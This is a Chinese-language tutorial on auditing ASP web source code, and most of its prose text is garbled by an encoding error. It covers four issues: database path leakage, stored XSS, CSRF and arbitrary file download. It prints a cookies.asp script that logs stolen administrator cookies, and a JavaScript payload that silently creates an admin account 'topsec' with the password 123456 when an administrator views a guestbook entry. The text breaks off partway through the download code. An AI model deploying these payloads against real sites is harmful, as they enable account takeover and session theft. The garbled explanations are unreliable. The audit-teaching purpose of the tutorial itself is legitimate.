Web源码安全审计之ASP篇

0×01ASPㆰӻ˖ASPᱟа⿽ᴽ࣑ಘㄟ㝊ᵜ㕆߉⧟ຳˈਟԕ⭘ᶕࡋᔪ઼䘀㹼ࣘᘱ㖁亥ᡆWebᓄ⭘〻ᒿDŽASP㖁亥ਟԕवਜ਼HTMLḷ䇠ǃᲞ䙊᮷ᵜǃ㝊ᵜભԔԕ৺COM㓴ԦㅹDŽ࡙⭘ASPਟԕੁ㖁亥ѝ␫࣐Ӕӂᔿ޵ᇩྲ൘㓯㺘অˈҏਟԕࡋᔪ֯⭘HTML㖁亥֌Ѫ⭘ᡧ⭼䶒Ⲵwebᓄ⭘〻ᒿDŽ0×02ASP┿⍎ӻ㓽˖аᮠᦞᓃ䐟ᖴ⋴䵢(DataBasePathLeak)ᾲ䘠˖ᮠᦞᓃ䐟ᖴ⋴䵢ѫ㾱㺘⧠൘ASP+AccessᩝᔪⲴWEBѝˈᖃ᭫ࠫ㘵ᨀӔ%5cⲴᰦىˈIISՊ䀓᷀䭉䈟ˈሬ㠤䗃ࠪҶⵏᇎᮠᦞᓃ䐟ᖴˈ%5cᱟ?Ⲵॱޝ䘋ࡦԓ⸱ˈҏቡᱟ?Ⲵਖа⿽㺘⽪ᯩ⌅DŽ┿⍎৏⨶˖ᡁԜ൘ᨀӔᮠᦞⲴᰦىˈIEՊ㠚ࣘᢺ%5c䖜ᦒᡀ/,Ӿ㘼ᗇࡠ਼аൠ൰DŽ൘asp㊫ර㖁ㄉѝˈ䜭Պ⭘ࡠањᮠᦞᓃ䘎᧕Ⲵ᮷Ԧˈ਽ᆇа㡜ᱟconn.aspDŽ┿⍎ԓ⸱˖䘉䟼ᡁ⭘ࣘ࣋᮷ㄐ㌫㔏ڊṸֻˈԓ⸱ྲл˖1.%2.dimconn3.dimconnstr4.dimdb5.db=database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb'ᮠᦞᓃ᮷ԦⲴս㖞6.Setconn=Server.CreateObject(ADODB.Connection)7.connstr=Provider=Microsoft.Jet.OLEDB.4.0;DataSource=&Server.MapPath(db)8.conn.Openconnstr9.%┿⍎࡙⭘˖ᖃ䇯䰞ቡՊᣕ䭉ሶᮠᦞᓃ㔍ሩ䐟ᖴ䗃ࠪࡠᇒᡧㄟˈྲлമᡰ⽪ᖃᮠᦞᓃ䐟ᖴ㻛⋴䵢ˈ᭫ࠫ㘵ቡਟԕሶᮠᦞᓃл䖭ࡠᵜൠˈ᢮ࡠ㺘ѝⲴਾਠ㇑⨶ઈ䍖ᡧ઼ᇶ⸱ˈ䘉ṧቡਟԕ䖫ᶮ䘋ޕ㖁ㄉⲴਾਠ㇑⨶ˈ↔┿⍎ਚ䪸ሩҾACCESSᮠᦞᓃˈSQLserverᮠᦞᓃнਇᖡ૽DŽࣘ࣋㌫㔏Ⲵ᳤ᓃ䰞仈ᐢѵˈ৫ᒤ360ޜਨѪ↔ਁᐳаࡉޜ੺ˈཊᇦჂփ䜭ᴹ䖜䖭䬮᧕ൠ൰˖DŽ┿⍎؞༽˖؞㺕↔┿⍎Ⲵᯩ⌅ᴹ⿽ˈㅜа⿽൘conn.openconnstrԓ⸱ѻࡽ࣐ޕOnErrorResumeNextˈㅜҼ⿽ᯩ⌅൘IISᴽ࣑ಘ䝽㖞䘹亩ѝ䘹ᤙĀੁᇒᡧㄟਁ䘱лࡇ᮷ᵜ䭉䈟⎸᚟āDŽྲлമ2Ҽ䐘ㄉ㝊ᵜ᭫ࠫ(Cross-SiteScripting)ᾲ䘠˖Cross-sitescripting(XSS)ˈᱟа⿽㓿ᑨࠪ⧠൘Webᓄ⭘ѝⲴ䇑㇇ᵪᆹޘ┿⍎ˈᆳݱ䇨ᚦ᜿Web⭘ᡧሶԓ⸱Ἵޕࡠᨀ׋㔉ަᆳ⭘ᡧ֯⭘Ⲵ亥䶒ѝDŽ∄ྲˈवᤜHTMLԓ⸱઼ᇒᡧㄟ㝊ᵜⲴ亥䶒DŽѪн઼ቲਐṧᔿ㺘(CSS)Ⲵ㕙߉␧⏶ˈ䙊ᑨሶ䐘ㄉ㝊ᵜ㕙߉ѪXSSDŽ᭫ࠫ㘵а㡜Պ࡙⭘XSS┿⍎ᯱ䐟ᦹ䇯䰞᧗ࡦ——ֻྲ਼Ⓚㆆ⮕(sameoriginpolicy)ᡆਁ䎧phishing᭫ࠫˈ㖁亥ᤲ傜ˈcookieコਆㅹDŽXss䐘ㄉ᭫ࠫ࠶Ѫє⿽ˈа⿽৽ሴර᭫ࠫˈ䘈ᴹа⿽ᆈۘර᭫ࠫDŽ৽ሴර઼᭫ࠫⓀ⸱ᇑ䇑ޣ㌫нབྷˈ൘↔⮕䗷ˈ䟽⛩ӻ㓽лᆈۘර᭫ࠫDŽ┿⍎৏⨶˖ᆈۘර᭫ࠫቡᱟሶᚦ᜿ԓ⸱䙊䗷Ӕӂ亥䶒Ἵޕᮠᦞᓃѝˈᖃ㇑⨶ઈ䇯䰞ࡠ䈳⭘ᚦ᜿ԓ⸱Ⲵ亥䶒ᰦˈ᭫ࠫਈӗ⭏ҶDŽֻྲ൘Ḁ㌫㔏⮉䀰৽侸ḿⴞѝ⮉䀰޵ᇩ㺘অᵚ㓿䗷ᆹޘ༴⨶ˈᇒᡧㄟਟԕԫ᜿ᨀӔᚦ᜿ԓ⸱ˈሬ㠤ҶXSS䐘ㄉ┿⍎DŽ┿⍎ԓ⸱˖1.%2.Content=3.Fori=1ToRequest.Form(Content).Count4.Content=Content&Request.Form(Content)(i)5.Next6.…………//ⴱ⮕䜘࠶ԓ⸱7.rs(Guest_ZIP)=HTMLEncode(Guest_ZIP)8.rs(Guest_TEL)=HTMLEncode(Guest_TEL)9.rs(Guest_FAX)=HTMLEncode(Guest_FAX)10.rs(Content)=Content11.rs.Update12.%к䘠ԓ⸱ѝRequest.Formᯩ⌅㧧ਆⲴcontent٬⋑ᴹ㓿䗷ᆹޘ༴⨶ˈ䙐ᡀਟԕXSSᆈۘර᭫ࠫDŽ┿⍎࡙⭘˖᭫ࠫ㘵൘⮉䀰޵ᇩṶѝ䗃ޕк䘠ԓ⸱ਾˈᖃਾਠ㇑⨶ઈḕⴻҶ↔ᶑ⮉䀰ˈࡉ䐘ㄉ᭫ࠫ⭏᭸ˈ䘉ᰦىሶ㇑⨶ઈⲴCOOKIESؑ᚟ਁ䘱ࡠxxxฏ਽л؍ᆈ䎧ᶕDŽcookies.asp᮷Ԧ࣏㜭ᱟ⭏ᡀњ᮷Ԧ؍ᆈ㇑⨶ઈⲴCOOKIESؑ᚟ˈԓ⸱ྲл˖1.%2.c=Request.ServerVariables(QUERY_STRING)3.testfile=Server.MapPath(cookies.txt)4.setfs=server.CreateObject(scripting.filesystemobject)5.setthisfile=fs.OpenTextFile(testfile,8,True,0)6.thisfile.Writeline(&c&)7.thisfile.close8.setfs=nothing9.%┿⍎؞༽˖ሶ“’””ḷㆮ䘋㹼HTML㕆⸱DŽй䐘ㄉ䈧≲՚䙐᭫ࠫ(CrossSiteRequestForgery)ᾲ䘠˖CSRFᱟCrossSiteRequestForgeryⲴ㕙߉ˈⴤ䈁䗷ᶕቡᱟ䐘ㄉ䈧≲՚䙐Ⲵ᜿ᙍˈ䙊ᑨ⭘ᶕᤷWEB㖁ㄉⲴ䘉а㊫┿⍎ˈণ൘Ḁњᚦ᜿ㄉ⛩Ⲵ亥䶒кˈ׳֯䇯䰞㘵䈧≲֐Ⲵ㖁ㄉⲴḀњURLˈӾ㘼䗮ࡠ᭩ਈᴽ࣑ಘㄟᮠᦞⲴⴞⲴDŽ┿⍎৏⨶˖㔃ਸ䐘ㄉ┿⍎ˈ࡙⭘JS㝊ᵜԓ⸱ˈڊ㇑⨶ઈ䓛ԭ᡽㜭ڊⲴһˈն䘉⿽ࣘ֌䶎㇑⨶ઈᵜ䓛Ⲵ䈧≲DŽ┿⍎ԓ⸱˖↔㌫㔏ѝᴹњᆹޘ䗷└࠭ᮠHTMLEncodeˈԓ⸱ྲл˖1.PublicFunctionHTMLEncode(str)2.IfNotIsNull(str)Then3.str=Replace(str,Chr(38),&)4.str=Replace(str,,)5.str=Replace(str,,)6.str=Replace(str,Chr(9),)7.str=Replace(str,Chr(32),)8.str=Replace(str,Chr(34),)9.str=Replace(str,Chr(39),')10.str=Replace(str,Chr(13)&Chr(10),11.)12.str=Replace(str,Chr(10),13.)14.str=Replace(str,Chr(13),15.)16.HTMLEncode=str17.EndIf18.EndFunction19.//ԕлᱟ┿⍎ޣ䭞⛩20.Content=21.Fori=1ToRequest.Form(Content).Count22.Content=Content&Request.Form(Content)(i)23.Next24.…………//ⴱ⮕䜘࠶ԓ⸱25.rs(Guest_ZIP)=HTMLEncode(Guest_ZIP)26.rs(Guest_TEL)=HTMLEncode(Guest_TEL)27.rs(Guest_FAX)=HTMLEncode(Guest_FAX)28.rs(Content)=Content29.rs.Updateк䘠ԓ⸱ѝContentਈ䟿㓿䗷Request.Form㧧ਆਾᒦ⋑ᴹۿGuest_FAXਈ䟿䘉ṧ㓿䗷HTMLEncode䗷└DŽ┿⍎࡙⭘˖࡙⭘ᯩ⌅ྲമᡰ⽪Xss.js㝊ᵜ֌⭘ᱟᢗ㹼␫࣐ањᯠⲴ㇑⨶ઈtopsecDŽԓ⸱ྲл˖1.varrequest=false;2.if(window.XMLHttpRequest){3.request=newXMLHttpRequest();4.if(request.overrideMimeType){5.request.overrideMimeType('text/xml');6.}7.}elseif(window.ActiveXObject){8.varversions=['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];9.for(vari=0;iversions.length;i++){10.try{11.request=newActiveXObject(versions[i]);12.}catch(e){}13.}14.}15.xmlhttp=request;16.17.add_admin();18.functionadd_admin(){19.varurl=/admin/SysAdmin_Add.asp?Action=SysAdmin_Add;20.varparams=SiteControl_LoginName=topsec&SiteControl_LoginPass=123456&SiteControl_RealName=topsec&imageField.x=24&imageField.y=8;21.xmlhttp.open(POST,url,true);22.xmlhttp.setRequestHeader(Content-type,application/x-);23.xmlhttp.setRequestHeader(Content-length,params.length);24.xmlhttp.setRequestHeader(Connection,close);25.xmlhttp.send(params);26.}Ἵޕྲമᡰ⽪Ⲵа⇥ԓ⸱ਾˈᖃ㇑⨶ઈ䘋ޕਾਠ৫ḕⴻ↔⮉䀰ⲴᰦىቡՊ䀖ਁ䈕┿⍎ˈ㌫㔏Պ㠚ࣘ㔉ᡁԜ࣐к䍖ᡧѪtopsec,ᇶ⸱Ѫ123456Ⲵ㇑⨶ઈDŽ┿⍎؞༽˖࣐ޕtoken䇔䇱ˈ؞༽ࡽਠ䐘ㄉ┿⍎DŽഋԫ᜿᮷Ԧл䖭(ArbitraryFileDownload)ᾲ䘠˖ྲ᷌㌫㔏ᆈ൘stream⍱⁑ᔿл䖭⁑ඇˈ㘼ሩᓄл䖭᮷ԦⲴൠ൰⋑ᴹڊ䗷ᆹޘ䗷└༴⨶ˈࡉՊਁ⭏ԫօ᮷Ԧ䜭ਟ㻛л䖭Ⲵᆹޘ䳀ᛓˈ൘windowsᒣਠл↔䰞仈ᴤ࣐ѕ䟽DŽ┿⍎৏⨶˖Windows㌫㔏᭟ᤱ“.asp+オṬā઼“.asp+.”ㅹ਼Ҿ“.asp”᮷Ԧˈྲ᷌ᆈ൘л䖭⁑ඇᵚ࣐傼䇱ˈࡉਟԕл䖭ԫ᜿᮷ԦDŽ┿⍎ԓ⸱˖л䶒ԕ⋨㞮ኅᵋ㌫㔏㓿ިл䖭┿⍎Ⓚ⸱ڊӻ㓽DŽޣ䭞Ⓚ⸱ྲл˖1.%2.DimStream3.DimContents4.DimFileName5.DimTrueFileName6.DimFileExt7.DimSavePath8.9.ConstadTypeBinary=110.FileName=Request.QueryString(FileName)11.IfFileName=Then12.Response.Writeᰐ᭸᮷Ԧ਽ʽ13.Response.End14.Endif15.16.FileExt=Mid(FileName,InStrRev(FileName,.)+1)17.SelectCaseUCase(FileExt)18.CaseASP,ASA,ASPX,ASAX,MDB19.Response.Write䶎⌅᫽֌ʽ20.Response.End21.EndSelect22.Response.Clear23.iflcase(right(FileName,3))=giforlcase(right(FileName,3))=jpgorlcase(right(FileName,3))=pngthen24.Response.ContentType=image/*'ሩമۿ᮷Ԧнࠪ⧠л䖭ሩ䈍Ṷ25.else26.Response.ContentType=application/ms-download27.endif28.Response.AddHeadercontent-disposition,attachment;filename=&Get